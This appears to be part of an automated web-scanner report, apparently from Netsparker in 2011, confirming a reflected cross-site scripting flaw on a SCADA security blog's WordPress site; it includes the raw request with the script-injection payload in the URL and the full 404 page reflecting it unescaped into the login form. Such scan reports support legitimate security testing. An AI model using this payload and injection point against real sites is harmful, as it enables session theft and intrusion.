</form></div><div id="text-6" class="widget widget_text"><div class="widget-title"><h3> </h3></div> <div class="textwidget"><p><b>Subscribe</b>: <a href="http://feeds.feedburner.com/digitalbond/oLPM"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_rss4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://feedburner.google.com/fb/a/mailverify?uri=digitalbond&loc=en_US"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_email4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://twitter.com/digitalbond"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_twitter4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a></p></div> </div><div id="text-7" class="widget widget_text"> <div class="textwidget"><p><b>Got a hot tip? See something interesting in SCADA Security?</b> <a href="mailto:info@digitalbond.com">Tell Us</a></p></div> </div><div id="wp_sidebarlogin-3" class="widget widget_wp_sidebarlogin"><div class="widget-title"><h3><span>Login</span></h3></div><form method="post" action="https://www.digitalbond.com/wp-includes/\'\"--></style></script><script>netsparker(0x000428)</script>/?_login=b5eb9cb5ba"> <p><label for="user_login">Username:</label><br/><input name="log" value="" class="mid" id="user_login" type="text" /></p>
<p><label for="user_pass">Password:</label><br/><input name="pwd" class="mid" id="user_pass" type="password" /></p>
<input type="hidden" name="redirect_to" value="https://www.digitalbond.com/wp-includes/\'\"--></style></script><script>netsparker(0x000428)</script>/?_login=13cbcc5887" />
<p class="rememberme"><input name="rememberme" class="checkbox" id="rememberme" value="forever" type="checkbox" /> <label for="rememberme">Remember me</label></p>
<p class="submit"><input type="submit" name="wp-submit" id="wp-submit" value="Login »" />
<input type="hidden" name="sidebarlogin_posted" value="1" />
<input type="hidden" name="testcookie" value="1" /></p>
</form>
<ul class="sidebarlogin_otherlinks"> <li><a href="https://www.digitalbond.com/wp-login.php?action=register" rel="nofollow">Register</a></li>
<li><a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="" rel="nofollow">Lost your password?</a></li>
</ul></div><div id="text-8" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br</p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS Security Tool Mailing List</a><br><br></p><p><a href="http://digitalbond.com/critical-intelligence/"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/Critintel_logo_250.jpg" alt="" title="Critintel_logo_250" width="250" height="143" class="aligncenter size-full wp-image-8808" /></a></p></div> </div><div id="kb-advanced-rss-3" class="widget widget_kbrss"><div class="widget-title"><h3><a class="kbrsswidget" href="http://feeds.critical-intelligence.com/?type=worth" title="Syndicate this content"><img width="14" height="14" src="http://digibond.wpengine.netdna-cdn.com/wp-includes/images/rss.png" alt="RSS" style="background:orange;color:white;" /></a> Worth Reading</h3></div><ul><li><a class='kbrsswidget' href='http://granitekey.blogspot.com/2011/04/executive-level-apathy-for.html' title='I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the circumstances. Hear me out for a moment before throwing daggers. '>Executive Level Apathy For Security...Maybe Not So Much </a></br> I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the ci</li></br><li><a class='kbrsswidget' href='http://community.controlglobal.com/content/nerc-cyber-attack-task-force-addressing-appropriate-issues' title='The scenario being addressed is an organized disruption that disables or impairs the integ..
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:05:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:05:37 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 11367
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Login or nothing found for Wp-includes '"-->< Style>< Script><script>netsparker(0x000428)< Script></title>
<link rel="shortcut icon" href="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="https://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="https://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Feed" href="https://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Comments Feed" href="https://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='https://www.digitalbond.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='https://www.digitalbond.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='https://www.digitalbond.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond's SCADA Security Portal' href='https://www.digitalbond.com/' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,405] --><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="https://www.digitalbond.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('https://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="https://www.digitalbond.com/?bfa_ata_file=js"></script>
<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="error404">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="coltwo" />
<col class="colthree" /></colgroup>
<tr>
<!-- Header -->
<td id="header" colspan="2">
<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="https://www.digitalbond.com/" title="Digital Bond's SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1"> </div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="https://www.digitalbond.com/"><img class="logo" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond's SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=1" title=""><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/zGN33S_Waterfall Banner - horizontal 2010.gif" alt="" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1"> </div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What’s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="https://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>
</td>
<!-- / Header -->
</tr>
<!-- Main Body -->
<tr id="bodyrow">
<!-- Main Column -->
<td id="middle">
<h2>Subscriber Content or Not Found</h2>
<p>Sorry, but the content you want is subscriber only. Lucky for you, subscribing to digitalbond.com is free. <b>Go to the right sidebar and either login or register.</b></p>
<p>If you are already logged in, then the requested link is broken or unavailable.</p>
</td>
<!-- / Main Column -->
<!-- Right Inner Sidebar -->
<!-- Right Sidebar -->
<td id="right">
<div id="search-3" class="widget widget_search"><form method="get" class="searchform" action="https://www.digitalbond.com/">
<table class="searchform" cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="searchfield">
<input type="text" class="text inputblur" value="" name="s" />
</td>
<td class="searchbutton">
<input name="submit" value="Search" type="image" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/magnifier2-gray.gif" style="display: block; border:none; padding: 0 0 0 5px; margin: 0;" />
</td>
</tr></table>
</form></div><div id="text-6" class="widget widget_text"><div class="widget-title"><h3> </h3></div> <div class="textwidget"><p><b>Subscribe</b>: <a href="http://feeds.feedburner.com/digitalbond/oLPM"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_rss4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://feedburner.google.com/fb/a/mailverify?uri=digitalbond&loc=en_US"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_email4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://twitter.com/digitalbond"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_twitter4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a></p></div> </div><div id="text-7" class="widget widget_text"> <div class="textwidget"><p><b>Got a hot tip? See something interesting in SCADA Security?</b> <a href="mailto:info@digitalbond.com">Tell Us</a></p></div> </div><div id="wp_sidebarlogin-3" class="widget widget_wp_sidebarlogin"><div class="widget-title"><h3><span>Login</span></h3></div><form method="post" action="https://www.digitalbond.com/wp-includes/\'\"--></style></script><script>netsparker(0x000428)</script>/?_login=b5eb9cb5ba"> <p><label for="user_login">Username:</label><br/><input name="log" value="" class="mid" id="user_login" type="text" /></p>
<p><label for="user_pass">Password:</label><br/><input name="pwd" class="mid" id="user_pass" type="password" /></p>
<input type="hidden" name="redirect_to" value="https://www.digitalbond.com/wp-includes/\'\"--></style></script><script>netsparker(0x000428)</script>/?_login=13cbcc5887" />
<p class="rememberme"><input name="rememberme" class="checkbox" id="rememberme" value="forever" type="checkbox" /> <label for="rememberme">Remember me</label></p>
<p class="submit"><input type="submit" name="wp-submit" id="wp-submit" value="Login »" />
<input type="hidden" name="sidebarlogin_posted" value="1" />
<input type="hidden" name="testcookie" value="1" /></p>
</form>
<ul class="sidebarlogin_otherlinks"> <li><a href="https://www.digitalbond.com/wp-login.php?action=register" rel="nofollow">Register</a></li>
<li><a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="" rel="nofollow">Lost your password?</a></li>
</ul></div><div id="text-8" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br</p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS Security Tool Mailing List</a><br><br></p><p><a href="http://digitalbond.com/critical-intelligence/"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/Critintel_logo_250.jpg" alt="" title="Critintel_logo_250" width="250" height="143" class="aligncenter size-full wp-image-8808" /></a></p></div> </div><div id="kb-advanced-rss-3" class="widget widget_kbrss"><div class="widget-title"><h3><a class="kbrsswidget" href="http://feeds.critical-intelligence.com/?type=worth" title="Syndicate this content"><img width="14" height="14" src="http://digibond.wpengine.netdna-cdn.com/wp-includes/images/rss.png" alt="RSS" style="background:orange;color:white;" /></a> Worth Reading</h3></div><ul><li><a class='kbrsswidget' href='http://granitekey.blogspot.com/2011/04/executive-level-apathy-for.html' title='I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the circumstances. Hear me out for a moment before throwing daggers. '>Executive Level Apathy For Security...Maybe Not So Much </a></br> I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the ci</li></br><li><a class='kbrsswidget' href='http://community.controlglobal.com/content/nerc-cyber-attack-task-force-addressing-appropriate-issues' title='The scenario being addressed is an organized disruption that disables or impairs the integ..
|
- /wp-admin/css/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000427)%3C/script%3E
/wp-admin/css/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000427)%3C/script%3E CONFIRMED |
Parameters
| Parameter | Type | Value |
| URI-BASED | Raw URI | '"--></style></script><script>alert(0x000427)</script> |
Request
GET /wp-admin/css/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000427)%3C/script%3E HTTP/1.1
Referer: https://www.digitalbond.com/wp-admin/css/login.css?ver=20110121
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Referer: https://www.digitalbond.com/wp-admin/css/login.css?ver=20110121
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:05:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:05:39 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 11384
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Login or nothing found for Wp-admin Css '"-->< Style>< Script><script>netsparker(0x000427)< Script></title>
<link rel="shortcut icon" href="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="https://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="https://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Feed" href="https://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Comments Feed" href="https://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='https://www.digitalbond.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='https://www.digitalbond.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='https://www.digitalbond.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond's SCADA Security Portal' href='https://www.digitalbond.com/' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,405] --><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="https://www.digitalbond.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('https://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="https://www.digitalbond.com/?bfa_ata_file=js"></script>
<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="error404">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="coltwo" />
<col class="colthree" /></colgroup>
<tr>
<!-- Header -->
<td id="header" colspan="2">
<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="https://www.digitalbond.com/" title="Digital Bond's SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1"> </div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="https://www.digitalbond.com/"><img class="logo" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond's SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=10" title="Emerging Threats Pro"><img src="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/uploads/SqJJy8_ad_april_2011_42K_v2-2.jpg" alt="Emerging Threats Pro" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1"> </div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What’s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="https://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>
</td>
<!-- / Header -->
</tr>
<!-- Main Body -->
<tr id="bodyrow">
<!-- Main Column -->
<td id="middle">
<h2>Subscriber Content or Not Found</h2>
<p>Sorry, but the content you want is subscriber only. Lucky for you, subscribing to digitalbond.com is free. <b>Go to the right sidebar and either login or register.</b></p>
<p>If you are already logged in, then the requested link is broken or unavailable.</p>
</td>
<!-- / Main Column -->
<!-- Right Inner Sidebar -->
<!-- Right Sidebar -->
<td id="right">
<div id="search-3" class="widget widget_search"><form method="get" class="searchform" action="https://www.digitalbond.com/">
<table class="searchform" cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="searchfield">
<input type="text" class="text inputblur" value="" name="s" />
</td>
<td class="searchbutton">
<input name="submit" value="Search" type="image" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/magnifier2-gray.gif" style="display: block; border:none; padding: 0 0 0 5px; margin: 0;" />
</td>
</tr></table>
</form></div><div id="text-6" class="widget widget_text"><div class="widget-title"><h3> </h3></div> <div class="textwidget"><p><b>Subscribe</b>: <a href="http://feeds.feedburner.com/digitalbond/oLPM"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_rss4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://feedburner.google.com/fb/a/mailverify?uri=digitalbond&loc=en_US"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_email4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://twitter.com/digitalbond"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_twitter4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a></p></div> </div><div id="text-7" class="widget widget_text"> <div class="textwidget"><p><b>Got a hot tip? See something interesting in SCADA Security?</b> <a href="mailto:info@digitalbond.com">Tell Us</a></p></div> </div><div id="wp_sidebarlogin-3" class="widget widget_wp_sidebarlogin"><div class="widget-title"><h3><span>Login</span></h3></div><form method="post" action="https://www.digitalbond.com/wp-admin/css/\'\"--></style></script><script>netsparker(0x000427)</script>/?_login=63d51667a3"> <p><label for="user_login">Username:</label><br/><input name="log" value="" class="mid" id="user_login" type="text" /></p>
<p><label for="user_pass">Password:</label><br/><input name="pwd" class="mid" id="user_pass" type="password" /></p>
<input type="hidden" name="redirect_to" value="https://www.digitalbond.com/wp-admin/css/\'\"--></style></script><script>netsparker(0x000427)</script>/?_login=2fdeaa8b4a" />
<p class="rememberme"><input name="rememberme" class="checkbox" id="rememberme" value="forever" type="checkbox" /> <label for="rememberme">Remember me</label></p>
<p class="submit"><input type="submit" name="wp-submit" id="wp-submit" value="Login »" />
<input type="hidden" name="sidebarlogin_posted" value="1" />
<input type="hidden" name="testcookie" value="1" /></p>
</form>
<ul class="sidebarlogin_otherlinks"> <li><a href="https://www.digitalbond.com/wp-login.php?action=register" rel="nofollow">Register</a></li>
<li><a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="" rel="nofollow">Lost your password?</a></li>
